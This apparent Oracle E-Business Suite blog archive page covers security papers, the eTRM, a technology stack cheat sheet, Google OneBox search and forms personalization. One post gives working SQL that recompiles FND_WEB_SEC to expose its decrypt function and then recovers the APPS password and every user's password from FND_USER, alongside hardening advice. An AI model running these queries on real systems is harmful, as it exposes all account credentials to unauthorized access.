5 Recent Oracle Security Related Documents
Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).
Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.
Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.
Locating dropped objects (PDF): This paper shows, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around†which can be sewn together to build an accurate picture of what the actions the attacker took. Perhaps, depending upon how quickly an investigation takes place from the incident in question, even all data pertaining to the dropped object or objects may still be found.
Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.
Oracle E-Business Suite Release 12 Electronic Technical Reference Manual Up And Running
We are in the process of upgrading our Oracle E-Business Suite (EBS) from 11.0.3 to 11.5.10 (more on that later). So, I frequently visit the EBS Electronic Technical Reference Manual (eTRM) to browse and try to understand the data models, database design and APIs of some EBS modules. When I logged in this morning I noticed that the eTRM for EBS release 12 had been posted. I thought of sharing this news with you.
Note: you need a Metalink account in order to be able to browse the eTRM.
Filed in Oracle with Comments Off | Tags: E-Business-SuiteOracle E-Business Suite Vulnerability: Users Passwords Decrypted
Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:
SQL> desc fnd_user;
Name Null? Type
----------------------------------------- -------- ----------------
USER_ID NOT NULL NUMBER(15)
USER_NAME NOT NULL VARCHAR2(100)
LAST_UPDATE_DATE NOT NULL DATE
LAST_UPDATED_BY NOT NULL NUMBER(15)
CREATION_DATE NOT NULL DATE
CREATED_BY NOT NULL NUMBER(15)
LAST_UPDATE_LOGIN NUMBER(15)
ENCRYPTED_FOUNDATION_PASSWORD NOT NULL VARCHAR2(100)
ENCRYPTED_USER_PASSWORD NOT NULL VARCHAR2(100)
...
The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores the encrypted value of the guest user.
To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;
The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.
So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_web_sec.decrypt (guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name
Now, using the above query, we can now decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_user.user_name,
fnd_web_sec.decrypt
((SELECT fnd_web_sec.decrypt
(guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name),
fnd_user.encrypted_user_password
) decrypted_user_password
FROM fnd_user
ORDER BY fnd_user.user_name
VOILA!
Of course, in order for the above queries to work, you have to have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance and assuming that passwords are not reset when a development instance is refreshed from a production instance, this can represent a serious security risk.
Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method. So, no need to even have access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords, like making sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW, changing the passwords for all Oracle Applications 11i seeded accounts, creating all new user accounts with strong and unique passwords and limiting access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts.
Updated January 9 2007: Oracle Applications Password Decryption (PDF)
Filed in Oracle, Security with 18 Comments | Tags: E-Business-Suite, hackOracle E-Business Suite technology stack and products cheat sheet
Steven Chan has just published a couple of useful posts. The first is a high level map of Oracle’s latest E-Business Suite Release 11i technology stack architecture:
The second is a cheat sheet that explains the relationships between Oracle marketing brands, products, product families, versions, and patchsets. He gives simple term definition to the following:
- Oracle E-Business Suite Release 11i
- Oracle Application Server 10g
- Oracle Database
- Fusion Middleware
- Fusion Applications
- E-Business Suite Release and Patch Naming Conventions
- Oracle Application Server 10g Releases
- Patch Compatibility and Certification Matrix
Thanks Steve.
Filed in Oracle with Comments Off | Tags: cheat-sheet, E-Business-SuiteSearch your Oracle E-Business Suite data using Google
Google recently announced the addition of OneBox functionality to their search appliance, which means that you can find just about anything through the familiar Google search box, including information stored in your corporate ERP system.
Google launched an initial set of OneBox modules with Oracle, Cognos, SAS and Salesforce.com.
According to Oracle, If you are an Oracle E-Business Suite customer, with Google OneBox for Enterprise, you are able to access key information from human resource (HR), enterprise resource planning (ERP), customer relationship management (CRM), and supply chain management (SCM) applications.
Before being able to search Oracle E-Business Suite, there is a sign-on process that guarantees user authorization and authentication prior to accessing secure enterprise data.
The search simultaneously spans multiple public, private, and enterprise information sources. For example, using the keyword ‘requisition’ provides multiple results from secure sources, including:
- Access to personal desktop documents
- Viewing personal E-Business Suite requisitions
- Focused navigation into enterprise applications
- Access to all corporate intranet site for policies
This looks really powerful.
Steven Chan, Director of Applications Technology Integration at Oracle reports that E-Business Suite search results are returned in XML format and merged into whatever other data Google finds from other sources.
It’ll be interesting to see if companies implement Google’s OneBox to search Oracle E-Business Suite, instead of, for example, using Oracle Portal, Collaboration Suite search functionality or even Oracle’s latest Secure Enterprise Search 10g product.
Updated May-01-2006:
Peter Heller, Senior Director, Oracle Applications Product Marketing, discusses with Cliff the new relationship between Oracle and Google, why companies want search in their enterprise applications and why this is so exciting for Oracle application customers. Listen.
Filed in Google, Oracle with 1 Comment | Tags: E-Business-Suite, Google, searchHow to personalize forms in Oracle Applications
With the Oracle E-Business Suite release 11.5.10, the Oracle has introduced a mechanism which revolutionizes the way the forms can be customized to fulfill the customer needs. For many years, Oracle Applications has provided a custom library using which the look and behavior of the standard forms can be altered, but the custom library modifications require extensive work on SQL and PL/SQL. In the release 11.5.10, Oracle has provided a simple and easy feature to implement the customer specific requirements without modifying the underlying forms code or CUSTOM library. Although CUSTOM library still can be used for forms customization to implement the complex business logic, the personalization feature provided in the latest release is easy, fast and requires minimum development effort. Ramakrishna Goud has put together a nice white paper about how to personalize the forms in Oracle Applications release 11.5.10.
Filed in Oracle with Comments Off | Tags: E-Business-Suite
